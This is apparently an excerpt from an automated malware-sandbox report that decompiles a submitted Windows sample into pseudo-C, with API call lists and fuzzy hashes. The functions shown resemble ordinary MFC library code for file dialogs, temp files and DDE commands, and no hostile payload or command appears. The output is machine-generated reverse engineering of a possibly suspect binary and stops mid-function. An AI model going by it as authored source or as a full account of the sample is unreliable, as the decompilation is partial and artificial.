                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MessageSend$State_memset$Parent$ClientCursorH_prolog3ScreenWindow
                  • String ID: ,
                  • API String ID: 2864161637-3772416878
                  • Opcode ID: cc3f7c5fffe2767f941653c96adc54678b203323e82f91da59ebd024d0d2e5c4
                  • Instruction ID: 12e6ef49b556adbd16c397df292db5107c7fbfc968b24c64fcc66a0911b4c434
                  • Opcode Fuzzy Hash: cc3f7c5fffe2767f941653c96adc54678b203323e82f91da59ebd024d0d2e5c4
                  • Instruction Fuzzy Hash: 74C1C175B00225DFDF209F65D889BAE7B71BB05300FC1007BEA05E62E1D7799845CB59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 94%
                  			E0042B39D(void* __ebx, signed int __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr _t280;
                  				intOrPtr _t281;
                  				intOrPtr _t282;
                  				intOrPtr _t283;
                  				intOrPtr _t285;
                  				struct HINSTANCE__** _t288;
                  				intOrPtr _t292;
                  				signed int _t300;
                  				signed int _t303;
                  				signed int _t315;
                  				signed int _t325;
                  				intOrPtr _t329;
                  				signed int* _t330;
                  				signed int _t347;
                  				signed int _t349;
                  				signed int _t358;
                  				signed int _t363;
                  				signed int _t368;
                  				intOrPtr _t386;
                  				signed int _t437;
                  				signed int _t438;
                  				signed int _t439;
                  				signed int _t441;
                  				signed int _t443;
                  				signed int _t445;
                  				signed int _t448;
                  				char* _t449;
                  				void* _t450;
                  				void* _t451;
                  				void* _t452;
                  				void* _t456;
                  				void* _t460;
                  				signed int _t469;
                  				void* _t472;
                  				void* _t477;
                  				void* _t484;
                  				void* _t498;
                  
                  				_t436 = __edx;
                  				_push(0x18);
                  				_t278 = E00431A9B(E0044C797, __ebx, __edi, __esi);
                  				_t443 = __ecx;
                  				 *(_t451 - 0x24) = __ecx;
                  				_t368 = 1;
                  				if( *((intOrPtr*)(__ecx + 0x78)) == 1) {
                  					_t280 =  *((intOrPtr*)(__ecx + 0x74));
                  					_t448 = 0;
                  					_t455 =  *((intOrPtr*)(_t280 + 0x30));
                  					if( *((intOrPtr*)(_t280 + 0x30)) != 0) {
                  						E004062EA(1, _t451 - 0x1c, __ecx, 0, _t455);
                  						_t363 =  *(_t443 + 0x80);
                  						 *(_t451 - 4) = 0;
                  						_t456 =  *((intOrPtr*)( *_t363 + 0x44))(_t363,  *(_t451 - 0x1c),  *((intOrPtr*)(_t280 + 0x30)));
                  						_t372 = 0 | _t456 < 0x00000000;
                  						_t457 = _t456 < 0;
                  						if(_t456 < 0) {
                  							L3:
                  							E00406436(_t368, _t372, _t443, _t448, _t457);
                  						}
                  						 *(_t451 - 4) =  *(_t451 - 4) | 0xffffffff;
                  						E004010B0( *(_t451 - 0x1c) + 0xfffffff0, _t436);
                  					}
                  					_t281 =  *((intOrPtr*)(_t443 + 0x74));
                  					_t459 =  *((intOrPtr*)(_t281 + 0x3c)) - _t448;
                  					if( *((intOrPtr*)(_t281 + 0x3c)) != _t448) {
                  						E004062EA(_t368, _t451 - 0x1c, _t443, _t448, _t459);
                  						_t358 =  *(_t443 + 0x80);
                  						 *(_t451 - 4) = _t368;
                  						_t460 =  *((intOrPtr*)( *_t358 + 0x58))(_t358,  *(_t451 - 0x1c),  *((intOrPtr*)(_t281 + 0x3c))) - _t448;
                  						_t372 = 0 | _t460 >= 0x00000000;
                  						if(_t460 >= 0 == _t448) {
                  							goto L3;
                  						} else {
                  							 *(_t451 - 4) =  *(_t451 - 4) | 0xffffffff;
                  							E004010B0( *(_t451 - 0x1c) + 0xfffffff0, _t436);
                  						}
                  					}
                  					_t282 =  *((intOrPtr*)(_t443 + 0x74));
                  					if( *((intOrPtr*)(_t282 + 0xc)) != _t448) {
                  						_t449 =  *((intOrPtr*)(_t282 + 0xc));
                  						_t368 = 0;
                  						if( *_t449 != 0) {
                  							do {
                  								_t450 = _t449 + E00431A10(_t449) + 1;
                  								_t449 = _t450 + E00431A10(_t450) + 1;
                  								_t368 = _t368 + 1;
                  							} while ( *_t449 != 0);
                  							 *(_t451 - 0x1c) = _t368;
                  							_t466 = _t368;
                  							if(_t368 > 0) {
                  								_t438 = 8;
                  								_t436 = _t368 * _t438 >> 0x20;
                  								_t448 = E00404461(_t466,  ~(0 | _t466 > 0x00000000) | _t368 * _t438);
                  								_pop(_t381);
                  								_t467 = _t448;
                  								if(_t448 == 0) {
                  									L13:
                  									E004063FE(_t368, _t381, _t443, _t448, _t467);
                  								}
                  								 *(_t451 - 0x18) =  *(_t451 - 0x18) & 0x00000000;
                  								_t468 =  *(_t451 - 0x1c);
                  								_t368 =  *( *((intOrPtr*)(_t443 + 0x74)) + 0xc);
                  								if( *(_t451 - 0x1c) > 0) {
                  									while(1) {
                  										E00405C38(_t451 - 0x14);
                  										 *(_t451 - 4) = 2;
                  										_t445 = E00431A10(_t368) + 1;
                  										_t439 = 2;
                  										_t436 = _t445 * _t439 >> 0x20;
                  										 *(_t451 - 0x20) = _t445;
                  										_t443 = E00404461(_t468,  ~(0 | _t468 > 0x00000000) | _t445 * _t439);
                  										_pop(_t381);
                  										_t469 = _t443;
                  										if(_t469 == 0) {
                  											goto L13;
                  										}
                  										E00405F3D(_t451 - 0x14, _t368);
                  										E0043065F(_t368,  *(_t451 - 0x14), _t443,  *((intOrPtr*)( *(_t451 - 0x14) - 0xc)) +  *((intOrPtr*)( *(_t451 - 0x14) - 0xc)) + 2,  *(_t451 - 0x14),  *((intOrPtr*)( *(_t451 - 0x14) - 0xc)) +  *((intOrPtr*)( *(_t451 - 0x14) - 0xc)) + 2);
                  										_t368 = _t368 +  *(_t451 - 0x20);
                  										 *(_t448 +  *(_t451 - 0x18) * 8) = _t443;
                  										_t443 = E00431A10(_t368) + 1;
                  										_t441 = 2;
                  										_t347 = _t443;
                  										_t436 = _t347 * _t441 >> 0x20;
                  										_t381 =  ~(_t469 > 0) | _t347 * _t441;
                  										_t349 = E00404461(_t469,  ~(_t469 > 0) | _t347 * _t441);
                  										_t452 = _t452 + 0x18;
                  										 *(_t451 - 0x20) = _t349;
                  										if(_t349 == 0) {
                  											goto L13;
                  										} else {
                  											E00405F3D(_t451 - 0x14, _t368);
                  											_t436 =  *((intOrPtr*)( *(_t451 - 0x14) - 0xc)) +  *((intOrPtr*)( *(_t451 - 0x14) - 0xc)) + 2;
                  											E0043065F(_t368,  *(_t451 - 0x14),  *(_t451 - 0x20),  *((intOrPtr*)( *(_t451 - 0x14) - 0xc)) +  *((intOrPtr*)( *(_t451 - 0x14) - 0xc)) + 2,  *(_t451 - 0x14),  *((intOrPtr*)( *(_t451 - 0x14) - 0xc)) +  *((intOrPtr*)( *(_t451 - 0x14) - 0xc)) + 2);
                  											 *(_t451 - 4) =  *(_t451 - 4) | 0xffffffff;
                  											 *(_t448 + 4 +  *(_t451 - 0x18) * 8) =  *(_t451 - 0x20);
                  											_t452 = _t452 + 0x10;
                  											_t368 = _t368 + _t443;
                  											 *(_t451 - 0x18) =  *(_t451 - 0x18) + 1;
                  											E004010B0( *(_t451 - 0x14) + 0xfffffff0,  *((intOrPtr*)( *(_t451 - 0x14) - 0xc)) +  *((intOrPtr*)( *(_t451 - 0x14) - 0xc)) + 2);
                  											if( *(_t451 - 0x18) <  *(_t451 - 0x1c)) {
                  												continue;
                  											} else {
                  												_t443 =  *(_t451 - 0x24);
                  											}
                  										}
                  										goto L19;
                  									}
                  									goto L13;
                  								}
                  								L19:
                  								_t325 =  *(_t443 + 0x80);
                  								_t472 =  *((intOrPtr*)( *_t325 + 0x10))(_t325,  *(_t451 - 0x1c), _t448);
                  								_t372 = 0 | _t472 >= 0x00000000;
                  								_t368 = 0;
                  								if(_t472 >= 0) {
                  									goto L3;
                  								} else {
                  									_t474 =  *(_t451 - 0x1c);
                  									if( *(_t451 - 0x1c) > 0) {
                  										do {
                  											E00404490(_t368, _t443, _t448, _t474,  *((intOrPtr*)(_t448 + _t368 * 8)));
                  											E00404490(_t368, _t443, _t448, _t474,  *((intOrPtr*)(_t448 + 4 + _t368 * 8)));
                  											_t368 = _t368 + 1;
                  											_t475 = _t368 -  *(_t451 - 0x1c);
                  										} while (_t368 <  *(_t451 - 0x1c));
                  									}
                  									E00404490(_t368, _t443, _t448, _t475, _t448);
                  									_t329 =  *((intOrPtr*)(_t443 + 0x74));
                  									_t386 = 1;
                  									if( *((intOrPtr*)(_t329 + 0x18)) > 1) {
                  										_t386 =  *((intOrPtr*)(_t329 + 0x18));
                  									}
                  									_t330 =  *(_t443 + 0x80);
                  									_t436 =  *_t330;
                  									_t477 =  *((intOrPtr*)( *_t330 + 0x14))(_t330, _t386);
                  									_t372 = 0 | _t477 >= 0x00000000;
                  									if(_t477 >= 0) {
                  										goto L3;
                  									}
                  								}
                  							}
                  						}
                  					}
                  					_t283 =  *((intOrPtr*)(_t443 + 0x74));
                  					_t448 = 0;
                  					if( *((intOrPtr*)(_t283 + 0x1c)) != 0 ||  *((intOrPtr*)(_t283 + 0x2c)) != 0) {
                  						_t370 = _t451 - 0x14;
                  						E00405C38(_t451 - 0x14);
                  						_t285 =  *((intOrPtr*)(_t443 + 0x74));
                  						 *(_t451 - 4) = 3;
                  						_t481 =  *((intOrPtr*)(_t285 + 0x1c)) - _t448;
                  						if( *((intOrPtr*)(_t285 + 0x1c)) == _t448) {
                  							_t368 =  *(_t451 - 0x14);
                  							goto L33;
                  						} else {
                  							_push( *((intOrPtr*)(_t285 + 0x1c)));
                  							E004062EA(_t368, _t451 - 0x1c, _t443, _t448, _t481);
                  							 *(_t451 - 4) = 4;
                  							E004149EC(_t451 - 0x14, _t451 - 0x1c);
                  							PathRemoveFileSpecW(E0042B001(_t451 - 0x14));
                  							E0041FF66(_t451 - 0x14, 0xffffffff);
                  							_t368 =  *(_t451 - 0x14);
                  							_t448 =  *(_t368 - 0xc);
                  							if(E0042AF3D(_t368, _t451 - 0x1c, _t443, _t448, _t448) == 0x5c) {
                  								_t448 = _t448 + 1;
                  							}
                  							_t437 =  *(_t451 - 0x1c);
                  							_t315 =  *(_t443 + 0x80);
                  							_t436 = _t437 + _t448 * 2;
                  							_t484 =  *((intOrPtr*)( *_t315 + 0x3c))(_t315, _t437 + _t448 * 2);
                  							_t372 = 0 | _t484 >= 0x00000000;
                  							if(_t484 >= 0) {
                  								goto L3;
                  							} else {
                  								_t370 =  *(_t451 - 0x1c) + 0xfffffff0;
                  								 *(_t451 - 4) = 3;
                  								E004010B0( *(_t451 - 0x1c) + 0xfffffff0, _t436);
                  								_t448 = 0;
                  								L33:
                  								_t286 =  *((intOrPtr*)(_t443 + 0x74));
                  								if( *((intOrPtr*)( *((intOrPtr*)(_t443 + 0x74)) + 0x2c)) == _t448) {
                  									L36:
                  									if( *(_t368 - 0xc) == _t448) {
                  										goto L46;
                  									} else {
                  										goto L37;
                  									}
                  								} else {
                  									if( *(_t368 - 0xc) != _t448) {
                  										L37:
                  										 *(_t451 - 0x18) = _t448;
                  										if(( *0x466938 & 0x00000001) == 0) {
                  											 *0x466938 =  *0x466938 | 0x00000001;
                  											_push("Shell32.dll");
                  											 *(_t451 - 4) = 5;
                  											 *0x466934 = E0040D5D6(_t368, _t370, _t443, _t448,  *0x466938);
                  											 *(_t451 - 4) = 3;
                  										}
                  										_t372 =  *0x466934; // 0x0
                  										if((0 | _t372 != _t448) == _t448) {
                  											goto L3;
                  										} else {
                  											if(( *0x466938 & 0x00000002) == 0) {
                  												 *0x466938 =  *0x466938 | 0x00000002;
                  												 *0x466930 = GetProcAddress(_t372, "SHCreateItemFromParsingName");
                  											}
                  											_t372 =  *0x466930; // 0x0
                  											if((0 | _t372 != _t448) == _t448) {
                  												goto L3;
                  											} else {
                  												_push(_t451 - 0x18);
                  												_push(0x454984);
                  												_push(_t448);
                  												_push(_t368);
                  												if(_t372->i() < _t448) {
                  													L46:
                  													 *(_t451 - 4) =  *(_t451 - 4) | 0xffffffff;
                  													E004010B0(_t368 - 0x10, _t436);
                  												} else {
                  													_t300 =  *(_t443 + 0x80);
                  													_t498 =  *((intOrPtr*)( *_t300 + 0x30))(_t300,  *(_t451 - 0x18)) - _t448;
                  													_t372 = 0 | _t498 >= 0x00000000;
                  													if(_t498 >= 0 == _t448) {
                  														goto L3;
                  													} else {
                  														_t303 =  *(_t451 - 0x18);
                  														 *((intOrPtr*)( *_t303 + 8))(_t303);
                  														goto L46;
                  													}
                  												}
                  											}
                  										}
                  									} else {
                  										_t370 = _t451 - 0x14;
                  										E00405F3D(_t451 - 0x14,  *((intOrPtr*)(_t286 + 0x2c)));
                  										_t368 =  *(_t451 - 0x14);
                  										goto L36;
                  									}
                  								}
                  							}
                  						}
                  					}
                  					_t288 =  *(_t443 + 0x80);
                  					_t436 = _t451 - 0x10;
                  					_push(_t451 - 0x10);
                  					 *(_t451 - 0x10) = _t448;
                  					_t372 =  *_t288;
                  					_push(_t288);
                  					if( *((intOrPtr*)( *_t288 + 0x28))() < 0) {
                  						goto L3;
                  					}
                  					_t292 =  *((intOrPtr*)(_t443 + 0x74));
                  					if(( *(_t292 + 0x34) & 0x00000200) == 0) {
                  						_t181 = _t451 - 0x10;
                  						 *_t181 =  *(_t451 - 0x10) & 0xfffffdff;
                  						__eflags =  *_t181;
                  					} else {
                  						 *(_t451 - 0x10) =  *(_t451 - 0x10) | 0x00000200;
                  					}
                  					if(( *(_t292 + 0x34) & 0x00002000) == 0) {
                  						_t188 = _t451 - 0x10;
                  						 *_t188 =  *(_t451 - 0x10) & 0xffffdfff;
                  						__eflags =  *_t188;
                  					} else {
                  						 *(_t451 - 0x10) =  *(_t451 - 0x10) | 0x00002000;
                  					}
                  					if(( *(_t292 + 0x34) & 0x02000000) == 0) {
                  						_t195 = _t451 - 0x10;
                  						 *_t195 =  *(_t451 - 0x10) & 0xfdffffff;
                  						__eflags =  *_t195;
                  					} else {
                  						 *(_t451 - 0x10) =  *(_t451 - 0x10) | 0x02000000;
                  					}
                  					if(( *(_t292 + 0x34) & 0x00001000) == 0) {
                  						_t202 = _t451 - 0x10;
                  						 *_t202 =  *(_t451 - 0x10) & 0xffffefff;
                  						__eflags =  *_t202;
                  					} else {
                  						 *(_t451 - 0x10) =  *(_t451 - 0x10) | 0x00001000;
                  					}
                  					if(( *(_t292 + 0x34) & 0x10000000) == 0) {
                  						_t209 = _t451 - 0x10;
                  						 *_t209 =  *(_t451 - 0x10) & 0xefffffff;
                  						__eflags =  *_t209;
                  					} else {
                  						 *(_t451 - 0x10) =  *(_t451 - 0x10) | 0x10000000;
                  					}
                  					if(( *(_t292 + 0x34) & 0x00000008) == 0) {
                  						_t216 = _t451 - 0x10;
                  						 *_t216 =  *(_t451 - 0x10) & 0xfffffff7;
                  						__eflags =  *_t216;
                  					} else {
                  						 *(_t451 - 0x10) =  *(_t451 - 0x10) | 0x00000008;
                  					}
                  					if(( *(_t292 + 0x34) & 0x00100000) == 0) {
                  						_t223 = _t451 - 0x10;
                  						 *_t223 =  *(_t451 - 0x10) & 0xffefffff;
                  						__eflags =  *_t223;
                  					} else {
                  						 *(_t451 - 0x10) =  *(_t451 - 0x10) | 0x00100000;
                  					}
                  					if(( *(_t292 + 0x34) & 0x00008000) == 0) {
                  						_t230 = _t451 - 0x10;
                  						 *_t230 =  *(_t451 - 0x10) & 0xffff7fff;
                  						__eflags =  *_t230;
                  					} else {
                  						 *(_t451 - 0x10) =  *(_t451 - 0x10) | 0x00008000;
                  					}
                  					if(( *(_t292 + 0x34) & 0x00010000) == 0) {
                  						_t237 = _t451 - 0x10;
                  						 *_t237 =  *(_t451 - 0x10) & 0xfffeffff;
                  						__eflags =  *_t237;
                  					} else {
                  						 *(_t451 - 0x10) =  *(_t451 - 0x10) | 0x00010000;
                  					}
                  					if(( *(_t292 + 0x34) & 0x00000100) == 0) {
                  						_t244 = _t451 - 0x10;
                  						 *_t244 =  *(_t451 - 0x10) & 0xfffffeff;
                  						__eflags =  *_t244;
                  					} else {
                  						 *(_t451 - 0x10) =  *(_t451 - 0x10) | 0x00000100;
                  					}
                  					if(( *(_t292 + 0x34) & 0x00000002) == 0) {
                  						_t251 = _t451 - 0x10;
                  						 *_t251 =  *(_t451 - 0x10) & 0xfffffffd;
                  						__eflags =  *_t251;
                  					} else {
                  						 *(_t451 - 0x10) =  *(_t451 - 0x10) | 0x00000002;
                  					}
                  					if(( *(_t292 + 0x34) & 0x00000800) == 0) {
                  						_t258 = _t451 - 0x10;
                  						 *_t258 =  *(_t451 - 0x10) & 0xfffff7ff;
                  						__eflags =  *_t258;
                  					} else {
                  						 *(_t451 - 0x10) =  *(_t451 - 0x10) | 0x00000800;
                  					}
                  					_t372 = 0x4000;
                  					if(( *(_t292 + 0x34) & 0x00004000) == 0) {
                  						_t265 = _t451 - 0x10;
                  						 *_t265 =  *(_t451 - 0x10) & 0xffffbfff;
                  						__eflags =  *_t265;
                  					} else {
                  						 *(_t451 - 0x10) =  *(_t451 - 0x10) | 0x00004000;
                  					}
                  					if(( *(_t292 + 0x54) & 0x00000001) == 0) {
                  						_t272 = _t451 - 0x10;
                  						 *_t272 =  *(_t451 - 0x10) & 0xfffbffff;
                  						__eflags =  *_t272;
                  					} else {
                  						 *(_t451 - 0x10) =  *(_t451 - 0x10) | 0x00040000;
                  					}
                  					_t443 =  *(_t443 + 0x80);
                  					_push( *(_t451 - 0x10));
                  					_push(_t443);
                  					if( *((intOrPtr*)( *_t443 + 0x24))() < 0) {
                  						goto L3;
                  					}
                  				}
                  				return E00431B73(_t278);
                  			}
                  0x0042b888
                  0x0042b888
                  0x0042b898
                  0x0042b8a0
                  0x0042b8a0
                  0x0042b8a0
                  0x0042b89a
                  0x0042b89a
                  0x0042b89a
                  0x0042b8ac
                  0x0042b8b3
                  0x0042b8b3
                  0x0042b8b3
                  0x0042b8ae
                  0x0042b8ae
                  0x0042b8ae
                  0x0042b8ba
                  0x0042b8c2
                  0x0042b8c9
                  0x0042b8c9
                  0x0042b8c9
                  0x0042b8c4
                  0x0042b8c4
                  0x0042b8c4
                  0x0042b8d4
                  0x0042b8df
                  0x0042b8df
                  0x0042b8df
                  0x0042b8d6
                  0x0042b8d6
                  0x0042b8d6
                  0x0042b8e6
                  0x0042b8ec
                  0x0042b8f1
                  0x0042b8f7
                  0x00000000
                  0x00000000
                  0x0042b8f7
                  0x0042b902

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0042B3A4
                  • _strlen.LIBCMT ref: 0042B45D
                  • _strlen.LIBCMT ref: 0042B467
                  • _strlen.LIBCMT ref: 0042B4C9
                  • _memcpy_s.LIBCMT ref: 0042B50D
                    • Part of subcall function 004062EA: __EH_prolog3.LIBCMT ref: 004062F1
                  • _strlen.LIBCMT ref: 0042B51C
                  • _memcpy_s.LIBCMT ref: 0042B565
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  • PathRemoveFileSpecW.SHLWAPI(00000000,00000000), ref: 0042B660
                  • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 0042B73A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: _strlen$H_prolog3$_memcpy_s$AddressException@8FilePathProcRemoveSpecThrow
                  • String ID: SHCreateItemFromParsingName$Shell32.dll
                  • API String ID: 515475663-214508289
                  • Opcode ID: afaa5c26efbec10f035749356761be0c0f4307d08cd13b05dcdb8681427ef078
                  • Instruction ID: 2d743887d1f872e1ac6e278da6c44de54668d799de1ddc935b4e9db1766ba105
                  • Opcode Fuzzy Hash: afaa5c26efbec10f035749356761be0c0f4307d08cd13b05dcdb8681427ef078
                  • Instruction Fuzzy Hash: B402F870A01226DFCB18DFA5D885ABFB7B4FF44315F54422EE421AB2E1DB389901CB94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 95%
                  			E0041D7DD(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				CHAR* _t74;
                  				int _t85;
                  				int _t90;
                  				void* _t101;
                  				CHAR* _t111;
                  				struct _SECURITY_DESCRIPTOR* _t125;
                  				void* _t142;
                  				CHAR** _t144;
                  				void* _t146;
                  				void* _t147;
                  				void* _t153;
                  
                  				_t142 = __edx;
                  				_push(0x260);
                  				E00431B04(E0044BB39, __ebx, __edi, __esi);
                  				_t146 = __ecx;
                  				 *(_t147 - 0x244) =  *(_t147 + 8);
                  				_t144 = __ecx + 0x10;
                  				 *((intOrPtr*)(_t147 - 0x24c)) =  *((intOrPtr*)(_t147 + 0x10));
                  				E00401E30(_t144);
                  				_t125 = 0;
                  				 *((intOrPtr*)(_t147 - 0x23c)) = 0;
                  				 *((intOrPtr*)(_t147 - 0x238)) = 0;
                  				 *((intOrPtr*)(_t147 - 0x234)) = 0;
                  				 *((intOrPtr*)(_t147 - 0x230)) = 0;
                  				 *((intOrPtr*)(_t147 - 0x22c)) = 0;
                  				 *((intOrPtr*)(_t147 - 0x228)) = 0;
                  				if(( *(_t147 + 0xc) & 0x00001000) != 0) {
                  					_t101 = E0042E202(0, _t142,  *(_t147 - 0x244), _t147 - 0x23c);
                  					_t150 = _t101;
                  					if(_t101 != 0) {
                  						E004014C0(_t147 - 0x240, _t142);
                  						 *(_t147 - 4) = 0;
                  						E00428F81(0, _t150,  *(_t147 - 0x244), _t147 - 0x240);
                  						 *(_t147 - 0x248) = 0;
                  						if(GetDiskFreeSpaceA( *(_t147 - 0x240), _t147 - 0x25c, _t147 - 0x250, _t147 - 0x268, _t147 - 0x260) != 0) {
                  							 *(_t147 - 0x248) =  *(_t147 - 0x25c) *  *(_t147 - 0x250) *  *(_t147 - 0x268);
                  						}
                  						 *(_t147 - 0x258) = E00434200( *((intOrPtr*)(_t147 - 0x224)),  *((intOrPtr*)(_t147 - 0x220)), 2, _t125);
                  						_t111 =  *(_t147 - 0x248);
                  						asm("cdq");
                  						_t153 = _t142 - _t142;
                  						if(_t153 >= 0 && (_t153 > 0 || _t111 >  *(_t147 - 0x258))) {
                  							GetFullPathNameA( *(_t147 - 0x244), 0x104, _t147 - 0x114, _t147 - 0x248);
                  							 *( *(_t147 - 0x248)) = _t125;
                  							GetTempFileNameA(_t147 - 0x114, "MFC", _t125, E004014F0(_t144, 0x105));
                  							E0040A356(_t144, 0xffffffff);
                  						}
                  						 *(_t147 - 4) =  *(_t147 - 4) | 0xffffffff;
                  						E004010B0( *(_t147 - 0x240) + 0xfffffff0, _t142);
                  					}
                  				}
                  				_t74 =  *_t144;
                  				_t156 =  *((intOrPtr*)(_t74 - 0xc)) - _t125;
                  				if( *((intOrPtr*)(_t74 - 0xc)) == _t125 || E0042935A(_t146, _t142, _t156, _t74,  *(_t147 + 0xc),  *((intOrPtr*)(_t147 - 0x24c))) == 0) {
                  					E00401E30(_t144);
                  					E0042935A(_t146, _t142, __eflags,  *(_t147 - 0x244),  *(_t147 + 0xc),  *((intOrPtr*)(_t147 - 0x24c)));
                  				} else {
                  					_t131 = _t146 + 0xc;
                  					E00402CA0(_t146 + 0xc, _t146,  *(_t147 - 0x244));
                  					if(GetFileTime( *(_t146 + 4), _t147 - 0x264, _t147 - 0x26c, _t147 - 0x258) != 0) {
                  						E0042E37E(_t125, _t131, _t142, _t144, _t146, _t147 - 0x23c, _t147 - 0x264);
                  						SetFileTime( *(_t146 + 4), _t147 - 0x264, _t147 - 0x26c, _t147 - 0x258);
                  					}
                  					_t146 = GetFileSecurityA;
                  					 *(_t147 - 0x240) = _t125;
                  					_t85 = GetFileSecurityA( *(_t147 - 0x244), 4, _t125, _t125, _t147 - 0x240);
                  					_t159 = _t85;
                  					if(_t85 != 0) {
                  						_t125 = E00404461(_t159,  *(_t147 - 0x240));
                  						_t90 = GetFileSecurityA( *(_t147 - 0x244), 4, _t125,  *(_t147 - 0x240), _t147 - 0x240);
                  						_t160 = _t90;
                  						if(_t90 != 0) {
                  							SetFileSecurityA( *_t144, 4, _t125);
                  						}
                  						E00404490(_t125, _t144, _t146, _t160, _t125);
                  					}
                  				}
                  				return E00431B87(_t125, _t144, _t146);
                  			}

                  APIs
                  • __EH_prolog3_GS.LIBCMT ref: 0041D7E7
                  • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000260), ref: 0041D89F
                  • GetFullPathNameA.KERNEL32(?,00000104,?,?,?,?,00000002,00000000,?,?,?,00000260), ref: 0041D90D
                  • GetTempFileNameA.KERNEL32(?,MFC,00000000,00000000,00000105,?,?,?,00000260), ref: 0041D935
                  • GetFileTime.KERNEL32(?,?,?,?,?,?,?,?,00000260), ref: 0041D9A0
                  • SetFileTime.KERNEL32(?,?,?,?,?,?,?,00000260), ref: 0041D9D7
                  • GetFileSecurityA.ADVAPI32(?,00000004,00000000,00000000,?), ref: 0041D9FA
                  • GetFileSecurityA.ADVAPI32(?,00000004,00000000,?,?), ref: 0041DA24
                  • SetFileSecurityA.ADVAPI32(?,00000004,00000000), ref: 0041DA2F
                    • Part of subcall function 00428F81: _memset.LIBCMT ref: 00428F9C
                    • Part of subcall function 00428F81: PathStripToRootA.SHLWAPI(00000000,?,?,0041D5EC,?,?), ref: 00428FB1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: File$Security$NamePathTime$DiskFreeFullH_prolog3_RootSpaceStripTemp_memset
                  • String ID: MFC
                  • API String ID: 40796375-3472178984
                  • Opcode ID: 2250a457610f27e5733e8c215d57b6ba1d7278de8302ce0a023aa894adcbcf46
                  • Instruction ID: 1d756b7bdd7ff3140dd47d20636a31886bf6137fab317b913ecda251622700a6
                  • Opcode Fuzzy Hash: 2250a457610f27e5733e8c215d57b6ba1d7278de8302ce0a023aa894adcbcf46
                  • Instruction Fuzzy Hash: 25612EB1900229ABDF21EF51CD89AEEB7B9FF48354F0041EAF519A6160DB359E84CF14
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 96%
                  			E00427FD5(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                  				void* _t196;
                  				signed int _t197;
                  				void* _t200;
                  				signed int _t201;
                  				void* _t204;
                  				signed int _t205;
                  				intOrPtr _t209;
                  				void* _t215;
                  				void* _t220;
                  				void* _t227;
                  				intOrPtr _t231;
                  				void* _t236;
                  				void* _t247;
                  				void* _t260;
                  				intOrPtr _t261;
                  				void* _t267;
                  				intOrPtr _t270;
                  				void* _t272;
                  				void* _t279;
                  				intOrPtr _t284;
                  				void* _t290;
                  				intOrPtr _t293;
                  				void* _t295;
                  				void* _t302;
                  				intOrPtr _t307;
                  				void* _t313;
                  				void* _t316;
                  				void* _t318;
                  				void* _t325;
                  				signed int _t332;
                  				intOrPtr* _t335;
                  				void* _t337;
                  				void* _t374;
                  				void* _t378;
                  				intOrPtr* _t462;
                  				intOrPtr _t469;
                  				intOrPtr _t471;
                  				void* _t475;
                  				void* _t476;
                  
                  				_t476 = __eflags;
                  				_t465 = __edx;
                  				_push(0x38);
                  				E00431A9B(E0044C50A, __ebx, __edi, __esi);
                  				 *((intOrPtr*)(_t475 - 0x14)) = __ecx;
                  				_push( *((intOrPtr*)(_t475 + 8)));
                  				E00406039(__ebx, _t475 + 8, __edx, __edi, __esi, _t476);
                  				 *((intOrPtr*)(_t475 - 4)) = 0;
                  				E0041576C(_t475 - 0x44, _t476);
                  				 *((char*)(_t475 - 4)) = 1;
                  				 *((intOrPtr*)(_t475 - 0x30)) = 4;
                  				_t196 = E00427A29(_t475 + 8, _t475 - 0x18, 7);
                  				 *((char*)(_t475 - 4)) = 2;
                  				_t197 = E00409F00(_t196, __edx, "[open(\"");
                  				asm("sbb bl, bl");
                  				 *((char*)(_t475 - 4)) = 1;
                  				E004010B0( *((intOrPtr*)(_t475 - 0x18)) + 0xfffffff0, __edx);
                  				_t374 = _t475 + 8;
                  				if( ~_t197 + 1 == 0) {
                  					_t200 = E00427A29(_t374, _t475 - 0x18, 8);
                  					 *((char*)(_t475 - 4)) = 4;
                  					_t201 = E00409F00(_t200, __edx, "[print(\"");
                  					asm("sbb bl, bl");
                  					_t361 =  ~_t201 + 1;
                  					 *((char*)(_t475 - 4)) = 1;
                  					E004010B0( *((intOrPtr*)(_t475 - 0x18)) + 0xfffffff0, _t465);
                  					_t378 = _t475 + 8;
                  					__eflags =  ~_t201 + 1;
                  					if( ~_t201 + 1 == 0) {
